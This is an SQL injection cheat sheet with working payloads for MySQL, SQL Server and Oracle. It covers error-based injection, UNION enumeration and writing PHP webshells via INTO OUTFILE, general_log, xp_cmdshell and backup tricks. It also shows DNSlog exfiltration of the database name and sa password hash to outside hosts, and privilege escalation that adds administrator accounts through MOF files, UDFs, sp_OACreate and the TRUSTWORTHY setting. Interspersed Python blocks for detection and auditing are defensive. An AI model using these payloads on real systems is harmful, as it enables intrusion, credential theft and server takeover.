[Vulnerability] SQL Injection: Advanced

Contents

Identifying the database

Gathering information

Techniques:

Error-raising methods for error-based injection

DNSlog blind-injection method

Privilege escalation methods

Filters and bypasses

0x00 Probe statements

Different databases differ in the details, and the differences are considerable. The common ones are MySQL, SQL Server and Oracle. (SQL Server is also written MSSQL.)

First, work out which database is in use:

  1. From error messages

    MySQL:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line x

    SQL Server:

    Msg 170, Level 15, State 1, Line 1

    Line 1: Incorrect syntax near 'foo

    Msg 105, Level 15, State 1, Line 1

    Unclosed quotation mark before the character string 'foo

    Microsoft ODBC Database Engine error

    Oracle:

    ORA-01756: quoted string not properly terminated

    ORA-00933: SQL command not properly ended

  2. From database-specific tables

    MySQL:

    select count(*) from information_schema.TABLES

    SQL Server:

    select count(*) from sysobjects

    select count(*) from msysobjects

    Oracle:

    select count(*) from sys.user_tables

Usage example:

-- MySQL
and (select count(*) from information_schema.TABLES)>0

-- SQLServer
and (select count(*) from sysobjects)>0

-- Oracle
and (select count(*) from sys.user_tables)>0

See [^1] for more ways of telling the databases apart.

Once the database is identified, gather information about it.

MySQL

Comment characters

/* */

;%00

` (only at the end of the statement)

Usage example:

SELECT * FROM Users WHERE username='' OR 1=1 -- ' AND password='';

SELECT * FROM Users WHERE id='' UNION SELECT 1,2,3`';

Database and system information

  1. Version

    VERSION()

    @@VERSION

    @@GLOBAL.VERSION

    /*!<MySQL version number> <content> */

  2. Hostname

    @@HOSTNAME

  3. User name (the user the database is currently running as)

    user()

    system_user()

    session_user()

  4. Database name

    database()

Usage example:

SELECT version();
SELECT /*!50000 'test', */ 1; -- MySQL versions above 5.00.00 execute the statement inside the /* */

Determining the number of columns

  1. 1' ORDER BY 1 --+

    Usage example:

    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    For example, when order by 3 works and order by 4 errors, the column count is 3.

  2. SELECT null,null,null --+

    Usage example:

    1' union select null --+
    1' union select null,null --+
    1' union select null,null,null --+
    1' union select null,null,null,null --+
    ...

    For example, when select null,null,null renders normally, the column count is 3.

    See [^2] for more.

SQL Server

Comment characters

/* */

;%00

Usage example:

SELECT * FROM Users WHERE username='' OR 1=1 --' AND password='';
SELECT * FROM Users WHERE id='' UNION SELECT 1,2,3/*;

Database and system information

  1. Version

    @@version

  2. Hostname

    host_name()

  3. User name

    user

    system_user

    session_user

  4. Database name

    db_name()

  5. Other

    Check for sa (sysadmin) privileges

    is_srvrolemember('sysadmin')

    Check for db_owner privileges

    is_member('db_owner')

    Check for public privileges

    is_srvrolemember('public')

Determining the number of columns

  1. 1' ORDER BY 1 --+

    Usage example:

    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    For example, when order by 3 works and order by 4 errors, the column count is 3.

  2. SELECT null,null,null --+

    Usage example:

    1' union select null --+
    1' union select null,null --+
    1' union select null,null,null --+
    1' union select null,null,null,null --+
    ...

    For example, when select null,null,null renders normally, the column count is 3.

    See [^3] for more.

Oracle

Unlike MySQL and SQL Server, Oracle requires a table after SELECT, otherwise the statement errors.

Oracle therefore has two virtual tables for this purpose:

dual, user_tables

Comment characters

/* */

Database and system information

  1. Version

    select banner from v$version where rownum=1;

  2. Hostname

    select sys_context('userenv','host') from dual;

  3. User name

    -- current user

    select user from dual;
    select username from user_users;

    -- list all users

    select username from all_users;

    -- list all users (requires privileges)

    select username from dba_users;

  4. Other

    -- roles of the current user

    select role from session_roles;

Determining the number of columns

  1. 1' ORDER BY 1 --+

    Usage example:

    1' ORDER BY 1 --+
    1' ORDER BY 2 --+
    1' ORDER BY 3 --+
    1' ORDER BY 4 --+
    1' ORDER BY 5 --+
    ...

    For example, when order by 3 works and order by 4 errors, the column count is 3.

  2. SELECT null,null,null --+

    Usage example:

    1' union select null from dual --+
    1' union select null,null from dual --+
    1' union select null,null,null from dual --+
    1' union select null,null,null,null from dual --+
    ...

    For example, when select null,null,null from dual renders normally, the column count is 3.

    See [^4] for more.
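As an added example (not part of the original post), a small Python checker that runs the three families of error signatures listed above over a set of HTTP response bodies, so a defender can confirm the application never returns a raw database error to the client; the sample responses are constructed.

```python
import re

# Error-message signatures for the three database families listed above.
DB_ERROR_SIGNATURES = {
    "mysql": [
        r"you have an error in your sql syntax",
        r"check the manual that corresponds to your mysql server version",
    ],
    "mssql": [
        r"incorrect syntax near",
        r"unclosed quotation mark before the character string",
        r"microsoft odbc",
        r"msg \d+, level \d+, state \d+",
    ],
    "oracle": [
        r"ora-\d{5}",
        r"quoted string not properly terminated",
        r"sql command not properly ended",
    ],
}

COMPILED = {db: [re.compile(p, re.IGNORECASE) for p in pats]
            for db, pats in DB_ERROR_SIGNATURES.items()}


def classify_db_error(body):
    """Return (db_family, matched_fragment) when the response body contains a
    recognisable database error, else None. Families are tried in dict order
    and the first match wins."""
    for db, patterns in COMPILED.items():
        for pat in patterns:
            m = pat.search(body)
            if m:
                return db, m.group(0)
    return None


def scan_responses(responses):
    """responses: iterable of (url, body). Returns one finding per leaking
    response; a response with no recognisable error is simply not listed."""
    findings = []
    for url, body in responses:
        hit = classify_db_error(body)
        if hit is not None:
            findings.append({"url": url, "db": hit[0], "fragment": hit[1]})
    return findings


# Constructed sample responses; none were captured from a real system.
SAMPLE_RESPONSES = [
    ("/item?id=1", "<html><body>Product 1</body></html>"),
    ("/item?id=1'", "You have an error in your SQL syntax; check the manual "
                    "that corresponds to your MySQL server version for the "
                    "right syntax to use near ''' at line 1"),
    ("/report?n=1'", "Msg 105, Level 15, State 1, Line 1\n"
                     "Unclosed quotation mark before the character string 'foo"),
    ("/emp?id=1'", "ORA-01756: quoted string not properly terminated"),
    ("/ok", "Something went wrong, please try again later."),
]

if __name__ == "__main__":
    for f in scan_responses(SAMPLE_RESPONSES):
        print(f"{f['url']}: leaks a {f['db']} error ({f['fragment']!r})")
```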

0x01 Common techniques

Error-based injection

MySQL

  1. floor() + count() + group by x

    Version: >5.0.96 (lower versions may work) <8.0.12 (lower versions may not work; 5.7.26 works)

    select count(*),concat(@@version,floor(rand(0)*2))x from information_schema.tables group by x;

  2. extractvalue(), updatexml()

    Version: > 5.1.5

    select extractvalue(1,concat(0x7e,(select @@version),0x7e));
    select updatexml(1,concat(0x7e,(select @@version),0x7e),1);

  3. geometrycollection(), multipoint(), polygon(), multipolygon(), linestring(), multilinestring()

    Version: > 5.5.47 < 5.7.17

    select multipoint((select * from (select * from (select @@version)a)b));

  4. exp()

    Version: >5.5.47 <5.5.53

    select exp(~(select*from(select @@version)x));

    Details: [^5][^6]

SQLServer

  1. Forced type-conversion errors

    select * from sysobjects where db_name()>0;
    select * from sysobjects where 1=convert(int,db_name());

    Details: [^7]

Oracle

  1. ctxsys.drithsx.sn()

    select ctxsys.drithsx.sn(1,(select user from dual)) from dual;

  2. XMLType()

    select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual;

  3. dbms_xdb_version.checkin()

    select dbms_xdb_version.checkin((select user from dual)) from dual;

  4. dbms_xdb_version.makeversioned()

    select dbms_xdb_version.makeversioned((select user from dual)) from dual;

  5. dbms_xdb_version.uncheckout()

    select dbms_xdb_version.uncheckout((select user from dual)) from dual;

  6. dbms_utility.sqlid_to_sqlhash()

    SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

  7. ordsys.ord_dicom.getmappingxpath()

    select ordsys.ord_dicom.getmappingxpath((select user from dual),user,user) from dual;

    Details: [^8]

Usage example

Taking a MySQL injection point as the example.

Injection point:

http://192.168.224.130/sqli-labs/Less-1/?id=1

union is used here, so determine the column count first, then match that count after select, padding with null where needed.

1' union select null,count(*),concat(@@version,floor(rand(0)*2))x from information_schema.tables group by x--+
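An added example, not from the original post: detection logic that runs over web-server access-log lines and flags the column-count enumeration (ORDER BY n, UNION SELECT null,...) and the error-based functions described above, after URL-decoding and comment stripping. The log lines are constructed and the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format), not from a real server.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=1%27%20ORDER%20BY%203--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=1%27%20ORDER%20BY%204--+ HTTP/1.1" 500 231
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-1/?id=1%27%20union%20select%20null,null,null--+ HTTP/1.1" 200 540
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))--+ HTTP/1.1" 500 300
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=order%20form HTTP/1.1" 200 800
"""

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Each rule is applied to the normalised query string; first rule to hit wins.
RULES = {
    "column_count_order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "column_count_union_null": re.compile(r"\bunion\s+(all\s+)?select\s+null(\s*,\s*null)*", re.I),
    "error_based_xml": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "error_based_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "error_based_geometry": re.compile(
        r"\b(multipoint|polygon|linestring|geometrycollection|multipolygon|multilinestring)"
        r"\s*\(\s*\(\s*select", re.I),
}


def normalise(query):
    """URL-decode twice (to catch double encoding), turn inline comments into a
    space and collapse whitespace so 'order/**/by' still matches."""
    q = unquote_plus(unquote_plus(query))
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q)


def analyse_log(text):
    """Return (ip, status, rule, decoded_query) for each probe-like request."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        query = path.split("?", 1)[1] if "?" in path else ""
        norm = normalise(query)
        for rule, pat in RULES.items():
            if pat.search(norm):
                hits.append((m.group("ip"), int(m.group("status")), rule, norm))
                break
    return hits


def suspicious_sources(hits, threshold=3):
    """IPs with at least `threshold` probe hits: a run of ORDER BY n / UNION
    SELECT null requests from one client is the enumeration described above."""
    counts = {}
    for ip, *_ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = analyse_log(SAMPLE_LOG)
    for h in found:
        print(h)
    print("enumerating clients:", suspicious_sources(found))
```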

Getshell

MySQL + PHP

outfile and dumpfile

Prerequisites:

  1. The absolute path of the web root is known
  2. php.ini has magic_quotes_gpc = Off
  3. MySQL runs as root, or MySQL can write files into a directory the web server parses
  4. mysql.conf or mysql.ini has secure_file_priv = (empty)

Details:

  1. The absolute path of the web root can be obtained from error messages, a phpinfo page, a 404 page, and so on.
  2. Whether magic_quotes_gpc is off can be seen on a phpinfo page, or inferred from the PHP version and its defaults: PHP <= 5.2.7 off by default; 5.2.7 < PHP < 5.3.4 on by default; PHP > 5.3.4 the option was removed.
  3. MySQL needs write permission in the target directory; usually whether the current user is root is taken as the indicator of whether files can be written.
  4. With stacked injection, the setting can be queried and changed. The query is: show variables like '%secure_file_priv%';

With all prerequisites met, write the webshell into the web root or another parsed directory with select ... into:

1' union select 1,"<?php @eval($_POST['storm']);?>",3 into outfile "C:/Tool/phpstudy_pro/WWW/testshellcmd.php" --+
-- or
1' union select 1,"<?php @eval($_POST['storm']);?>",3 into dumpfile "C:/Tool/phpstudy_pro/WWW/testshellcmd.php" --+

Details: [^9][^10]

general_log and slow_query_log

Prerequisites:

  1. The absolute path of the web root is known
  2. php.ini has magic_quotes_gpc = Off
  3. MySQL runs as root
  4. Stacked injection, or the ability to log in to MySQL remotely

Details:

  1. The first three points are as above.

  2. Difference between general_log and slow_query_log: general_log records every query, slow_query_log records only slow queries. Because a website produces few slow queries, slow_query_log is more effective and more likely to succeed than general_log.

  3. Check whether query logging is on

    show variables like '%general_log%';
    -- or
    show variables like '%slow_query_log%';

  4. Turn logging on and set the path

    set global general_log = on; -- enable query logging; off by default (the file grows very large if left on)
    set global general_log_file = 'C:\\Tool\\phpstudy_pro\\WWW\\testshell345.php'; -- set the log path
    -- or
    set global slow_query_log=1; -- enable the slow query log (disabled by default)
    set global slow_query_log_file='C:\\Tool\\phpstudy_pro\\WWW\\testshell345.php'; -- change the log file path

  5. Write the webshell

    select '<?php phpinfo();?>';
    -- or
    select '<?php @eval($_POST[abc]);?>' or sleep(11);

  6. Turn logging off (preferably restoring the log path as well)

    set global general_log = off;
    -- or
    set global slow_query_log=0;

    Details: [^11][^12]

SQLServer

xp_cmdshell

Prerequisites:

  1. The absolute path of the web root is known
  2. The injection point allows stacked queries, or allows building an if statement (of the form: select 1 where 1=1 if 1=1)
  3. The corresponding permission, db_owner

Details:

  1. Check whether xp_cmdshell exists

    Select count(*) from master..sysobjects where xtype='X' and name='xp_cmdshell';

    A return value of 1 means xp_cmdshell exists.

  2. Since SQL Server 2005 xp_cmdshell is disabled by default; check whether it is disabled

    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';

    A return value of 1 means xp_cmdshell is enabled.

  3. If xp_cmdshell is disabled, it can be enabled with

    ;EXEC sp_configure 'show advanced options',1; -- allow advanced options to be changed
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',1; -- enable the xp_cmdshell extension
    EXEC sp_configure reconfigure;

    Usage example:

    Stacked injection

    1';EXEC sp_configure 'show advanced options',1;EXEC sp_configure reconfigure;EXEC sp_configure 'xp_cmdshell',1;EXEC sp_configure reconfigure;--+

    IF statement

    1' if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell ''whoami''');--+

Write the webshell into the web root or another parsed directory via xp_cmdshell:

;exec master..xp_cmdshell 'echo ^<?php phpinfo();?^> > C:\Tool\phpstudy_pro\WWW\testshell.php' ;--+
-- or
1' if 1=1 execute('exec master..xp_cmdshell ''echo ^<?php phpinfo();?^> > C:\Tool\phpstudy_pro\WWW\testshell.php'' ;');--+

On getting around the lack of stacked injection, see [^13].

Differential backup

Prerequisites:

  1. The absolute path of the web root is known
  2. The injection point allows stacked queries, or a SQL Server shell is available
  3. The corresponding permission, db_owner

Details:

  1. Get the current database name, or create a database

    -- example of getting the current database name
    -1' union all select null,db_name()--+
    -- create a database
    1';create database test2;--+

  2. Back up the database

    1';backup database test2 to disk = 'C:\phpstudy\PHPTutorial\WWW\test2.bak';--+

  3. Create a new table and insert data

    1';use test2;create table [dbo].[test2] ([cmd] [image]);--+
    1';use test2;insert into test2(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);--+

    3c3f70687020706870696e666f28293b3f3e is the hex encoding of

    <?php phpinfo();?>

  4. Take the differential backup

    1';backup database test2 to disk='C:\phpstudy\PHPTutorial\WWW\test2.php' WITH DIFFERENTIAL,FORMAT;--+

  5. Access the webshell

    If it does not succeed, keep requesting it; access it through the race condition.

  6. Finally, do not forget to drop the database or table

    1';drop database test2;--+
    1';drop table test2;--+

    PS: without stacked injection, the backup cannot be taken through execute.

Log backup

Prerequisites:

  1. The absolute path of the web root is known
  2. The injection point allows stacked queries, or a SQL Server shell is available
  3. The corresponding permission, db_owner
  4. The database has been backed up before

Details:

  1. Get the current database name

    -- example of getting the current database name
    -1' union all select null,db_name()--+

  2. Set the database to the full recovery model

    1';alter database test set RECOVERY FULL--+

  3. Back the database up to the chosen directory

    1';backup database test to disk = 'C:\Tool\phpstudy_pro\WWW\test.bak' with init--+

  4. Create a table with one image-type column

    1';create table cmd(a image)--+

  5. Insert the one-line webshell into the cmd table

    1';insert into cmd(a) values (0x3c3f70687020706870696e666f28293b3f3e)--+

    3c3f70687020706870696e666f28293b3f3e is the hex encoding of

    <?php phpinfo();?>

  6. Back up the log, writing the webshell into the chosen web directory

    1';backup log test to disk = 'C:\Tool\phpstudy_pro\WWW\test.php'--+

    Details: [^14]

For more, see [^15][^16].

Oracle

Using stored procedures

Prerequisites:

  1. The absolute path of the web root is known
  2. DBA privileges
  3. An Oracle shell is needed

Details:

  1. Create an Oracle directory object pointing at the absolute path of the web root or another parsed directory

    create or replace directory WEBSHELL_DIR as 'C:\Tool\phpstudy_pro\WWW';

  2. Grant privileges

    grant read, write on directory WEBSHELL_DIR to system;

  3. Write the webshell

    declare
      webshell_file utl_file.file_type;
    begin
      webshell_file := utl_file.fopen('WEBSHELL_DIR', 'webshellaa.php', 'w');
      utl_file.put_line(webshell_file, '<?php eval($_POST["pass"]); ?>');
      utl_file.fflush(webshell_file);
      utl_file.fclose(webshell_file);
    end;

    Related: [^17]

Getshell summary: [^18]

DNSlog out-of-band

A DNSlog server can be self-hosted [^19], or a DNSlog platform [^20] can be used.

Before using it, read the DNSlog tutorial [^22].

MySQL

SELECT load_file(concat('\\\\',(select database()),'.cmr1ua.ceye.io\\abc'))

Example:

http://127.0.0.1/lou/sql/Less-9/?id=1' and load_file(concat('\\\\',(select database()),'.cmr1ua.ceye.io\\abc'))--+

Note: if the value contains special characters, encode it with hex() before sending.

Note 2: this only works when the server is Windows; it is not usable on Linux.

Details: [^22]

SQLServer

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
  master.dbo.fn_varbintohexstr(password_hash)
  FROM sys.sql_logins WHERE name='sa')
  +'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

Example:

http://127.0.0.1/mssql.php?id=1;DECLARE @host varchar(1024);SELECT @host=(SELECT master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.b182oj.ceye.io'; EXEC('master..xp_dirtree "\'%2b@host%2b'\foobar$"');--+

Oracle

All of these require network privileges to be configured.

SELECT UTL_HTTP.REQUEST((select user from dual)||'.b182oj.ceye.io') FROM sys.DUAL;
SELECT DBMS_LDAP.INIT((select user from dual)||'.b182oj.ceye.io',80) FROM sys.DUAL;
SELECT HTTPURITYPE((select user from dual)||'.xx.b182oj.ceye.io').GETCLOB() FROM sys.DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((select user from dual)||'.ddd.b182oj.ceye.io') FROM sys.DUAL;

Privilege escalation

MySQL

MOF privilege escalation

Prerequisites:

  1. Must be Windows, and a version below Windows Server 2008
  2. The account MySQL runs as has permission to read and write the c:/windows/system32/wbem/mof directory
  3. mysql.conf or mysql.ini has secure_file_priv = (empty) (from MySQL 5.7 the default is secure-file-priv = null)

Details:

  1. Contents of the mof file. This file adds a user hpdoger with password 123456 on the server; the command can be replaced with another.

    #pragma namespace("\\\\.\\root\\subscription")
    instance of __EventFilter as $EventFilter
    {
        EventNamespace = "Root\\Cimv2";
        Name = "filtP2";
        Query = "Select * From __InstanceModificationEvent "
                "Where TargetInstance Isa \"Win32_LocalTime\" "
                "And TargetInstance.Second = 5";
        QueryLanguage = "WQL";
    };
    instance of ActiveScriptEventConsumer as $Consumer
    {
        Name = "consPCSV2";
        ScriptingEngine = "JScript";
        ScriptText =
        "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")";
    };
    instance of __FilterToConsumerBinding
    {
        Consumer = $Consumer;
        Filter = $EventFilter;
    };

  2. Upload the file above to the target server (if it could be uploaded straight into c:\windows\system32\wbem\mof\, there would be no need for this escalation method at all), then run

    select load_file('<file location>') into dumpfile 'c:\\windows\\system32\\wbem\\mof\\nullevt.mof';

  3. If there is no way to upload a file, MySQL's file export can be used instead:

    • Save the mof content above as a file, then hex() the file in MySQL

      select hex(load_file("C:\Tool\XY\test.mof"));

      which yields a hex string

    • On the target server's MySQL, export the file:

      select unhex('<hex string>') into dumpfile "c:\\windows\\system32\\wbem\\mof\\nullevt.mof";

  4. Then change the command to

    net.exe localgroup administrators hpdoger /add

    which adds the user to the administrators group.

Details: [^23]

UDF privilege escalation

Prerequisites:

  1. A MySQL shell (remote or local)
  2. mysql.conf or mysql.ini has secure_file_priv = (empty) (from MySQL 5.7 the default is secure-file-priv = null)
  3. The user MySQL is started as is root (ignored on Windows)

Details:

  1. Prepare the udf file; it can be taken from msf on Kali, at /usr/share/metasploit-framework/data/exploits/mysql

  2. Check the version

    select version();

    Check the system architecture

    show variables like "%compile%";

    Check the plugin location

    show variables like "%plugin%";

  3. Where the udf file goes depends on the MySQL version and the OS version

    • MySQL < 5.1

      Windows Server 2003: c:\windows\system32\

      Windows Server 2000: c:\winnt\system32\

    • MySQL >= 5.1

      <MySQL directory>\lib\plugin\

  4. Upload the udf file matching the OS and architecture to that location

    Windows uses the dll, Linux the so.

    With a webshell the file can be uploaded directly; otherwise follow these steps:

    • Open the file in something like 010editor and export it as a hex file

      010editor -> File -> Export Hex -> default Export Type is Hex Text, default Bytes Per Row is 16 -> Export

    • Open the txt file and remove the spaces and line breaks so it becomes a single string

    • Prefix it with 0x

    • Use select ... into dumpfile to export the string to a file

      select <hex string> into dumpfile '<location>/udf.dll';

      select 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into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin/udf.dll';

  5. If there is no webshell, MySQL is above 5.1, the OS is Windows, and the \lib\plugin directory does not exist by default, exporting the string straight to a file errors; ADS can be used to create the plugin directory [^25]

    select 'xxx' into dumpfile '<MySQL directory>/lib::$INDEX_ALLOCATION';

    -- errors, but the directory is created successfully
    select 'xxx' into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib::$INDEX_ALLOCATION';
    select 'xxx' into dumpfile 'C:/Tool/phpstudy_pro/Extensions/MySQL5.5.29/lib/plugin::$INDEX_ALLOCATION';

  6. Create a function referencing the uploaded udf file

    -- win
    create function sys_eval returns string soname 'udf.dll';
    -- Linux
    create function sys_eval returns string soname 'udf.so';

  7. Execute commands with the created function

    select sys_eval('net user');
    select sys_eval('net user hpdoger 123456 /add');
    select sys_eval('net localgroup administrators hpdoger /add');

  8. Privileges escalated

    The command to list the functions is

    select * from mysql.func;

    The command to drop the function is

    drop function sys_eval;

Details: [^26]; some tips: [^27]
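An added example, not from the original post, serving the outfile/dumpfile, general_log and UDF sections above: a Python audit over the output of SHOW VARIABLES, SHOW GRANTS and SELECT name, dl FROM mysql.func that reports the conditions those sections depend on (an empty secure_file_priv, a query log pointing into a web directory, FILE-capable grants, registered UDFs). The query results are constructed dictionaries rather than live driver output, and the severities are my own.

```python
import re

# Constructed query results, shaped as a DB driver would return them for the
# three statements named in the comments; the values are invented.
SAMPLE_VARIABLES = {            # SHOW VARIABLES (Variable_name -> Value)
    "secure_file_priv": "",
    "general_log": "ON",
    "general_log_file": "C:\\Tool\\phpstudy_pro\\WWW\\testshell345.php",
    "slow_query_log": "OFF",
    "slow_query_log_file": "C:\\mysql\\data\\slow.log",
}
SAMPLE_GRANTS = [               # SHOW GRANTS FOR CURRENT_USER()
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'%' WITH GRANT OPTION",
]
SAMPLE_FUNCS = [                # SELECT name, dl FROM mysql.func
    ("sys_eval", "udf.dll"),
]

WEB_EXTENSIONS = (".php", ".jsp", ".asp", ".aspx")


def _norm(path):
    return path.lower().replace("\\", "/")


def audit_mysql(variables, grants, funcs, web_roots=()):
    """Return a list of (severity, finding). web_roots are directories the web
    server executes scripts from; with none given only the file extension of
    each log path is checked."""
    findings = []

    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append(("HIGH", "secure_file_priv is empty: INTO OUTFILE/DUMPFILE and "
                                 "LOAD_FILE may use any path the mysqld account can reach"))
    elif sfp is not None and sfp.upper() != "NULL":
        findings.append(("INFO", f"secure_file_priv confines file I/O to {sfp}"))
    # None / "NULL" means file import and export are disabled entirely.

    for switch, file_var in (("general_log", "general_log_file"),
                             ("slow_query_log", "slow_query_log_file")):
        path = variables.get(file_var, "")
        in_web = _norm(path).endswith(WEB_EXTENSIONS) or any(
            _norm(path).startswith(_norm(root)) for root in web_roots)
        if in_web:
            enabled = variables.get(switch, "OFF").upper() in ("ON", "1")
            findings.append(("HIGH" if enabled else "MEDIUM",
                             f"{file_var} points into a web-served location: {path}"))

    for grant in grants:
        up = grant.upper()
        if re.search(r"\bFILE\b", up) or "ALL PRIVILEGES ON *.*" in up:
            findings.append(("HIGH", f"account holds the FILE privilege: {grant}"))
        if re.search(r"\bSUPER\b", up) or "ALL PRIVILEGES ON *.*" in up:
            findings.append(("MEDIUM", f"account can SET GLOBAL general_log / log paths: {grant}"))

    for name, dl in funcs:
        findings.append(("HIGH", f"user-defined function {name} is loaded from {dl} (mysql.func)"))

    return findings


if __name__ == "__main__":
    for severity, text in audit_mysql(SAMPLE_VARIABLES, SAMPLE_GRANTS, SAMPLE_FUNCS,
                                      web_roots=("C:\\Tool\\phpstudy_pro\\WWW",)):
        print(severity, text)
```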

SQLServer

Command-based privilege escalation

Prerequisites:

  1. A SQL Server shell

  2. The SQL Server account has system privileges (the sa account has them directly)

  3. The SQL Server service account has administrator privileges

    Note: when I tested on Win7, I found that the SQL Server service account defaults to Network Service, which does not have the privileges, so for your own tests change it to a local account.

    How to change it: Services -> SQL Server (SQLEXPRESS) -> Log On -> Local System account

Details:

xp_cmdshell

  1. Check whether xp_cmdshell is enabled

    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';

  2. Enable xp_cmdshell

    EXEC sp_configure 'show advanced options',1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',1;
    EXEC sp_configure reconfigure;

  3. Create a system user and give it administrator rights

    exec master..xp_cmdshell 'net user testaa pinohd123. /add';
    exec master..xp_cmdshell 'net localgroup administrators testaa /add';

  4. Disable xp_cmdshell

    EXEC sp_configure 'show advanced options',1;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'xp_cmdshell',0;
    EXEC sp_configure reconfigure;
    EXEC sp_configure 'show advanced options',0;
    EXEC sp_configure reconfigure;

sp_OACreate

  1. Check whether it is enabled (disabled by default)

    SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'Ole Automation Procedures';

  2. Enable sp_OACreate

    exec sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    exec sp_configure 'Ole Automation Procedures', 1;
    EXEC sp_configure reconfigure;

  3. Create a system user and give it administrator rights

    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'cmd.exe /c net user test 123123123. /add'
    declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'cmd.exe /c net localgroup administrators test /add'

  4. Disable sp_OACreate

    exec sp_configure 'show advanced options', 1;
    EXEC sp_configure reconfigure;
    exec sp_configure 'Ole Automation Procedures', 0;
    EXEC sp_configure reconfigure;
    exec sp_configure 'show advanced options', 0;
    EXEC sp_configure reconfigure;

More: [^28]

Sandbox privilege escalation

Prerequisites:

  1. A SQL Server shell

  2. The SQL Server account has system privileges (the sa account has them directly)

  3. The SQL Server service account has administrator privileges

    Note: when I tested on Win7, I found that the SQL Server service account defaults to Network Service, which does not have the privileges, so for your own tests change it to a local account.

    How to change it: Services -> SQL Server (SQLEXPRESS) -> Log On -> Local System account

  4. 32-bit system (the test on 64-bit Win7 failed)

Details:

  1. Enable sandbox mode

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;

  2. Create a system user and give it administrator rights

    select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net user quan 121345 /add")')
    select * from openrowset('microsoft.jet.oledb.4.0' ,';database=c:\windows\system32\ias\ias.mdb' ,'select shell("cmd.exe /c net localgroup administrators quan /add")')

  3. Restore the default value

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2;

More: [^29]

Trusted-database privilege escalation (from dbo to sysadmin)

Prerequisites:

  1. A SQL Server shell
  2. A database the current account belongs to has TRUSTWORTHY enabled

Details:

  1. Find the databases with TRUSTWORTHY enabled

    SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;

    Databases with a value of 1 have TRUSTWORTHY enabled.

  2. Elevate the user to sysadmin (substitute the database and user names)

    -- switch to the trusted database
    USE TestDb;
    GO
    -- elevate the current user to sysadmin
    CREATE PROCEDURE sp_elevate_me WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'singll','sysadmin';
    GO
    -- run it
    EXEC sp_elevate_me;

  3. Verify

    -- check whether the current user has sysadmin
    SELECT is_srvrolemember('sysadmin')

  4. How to set up a trusted database (to reproduce)

    -- the whole setup is done with sysadmin rights
    -- create the database
    CREATE DATABASE TestDb;

    -- switch to it
    USE TestDb;

    -- assign the database to the login singll
    ALTER LOGIN [singll] with default_database = [TestDb];

    -- create the user
    CREATE USER [singll] FROM LOGIN [singll];

    -- grant dbo
    EXEC sp_addrolemember [db_owner], [singll];

    -- set the database as trustworthy
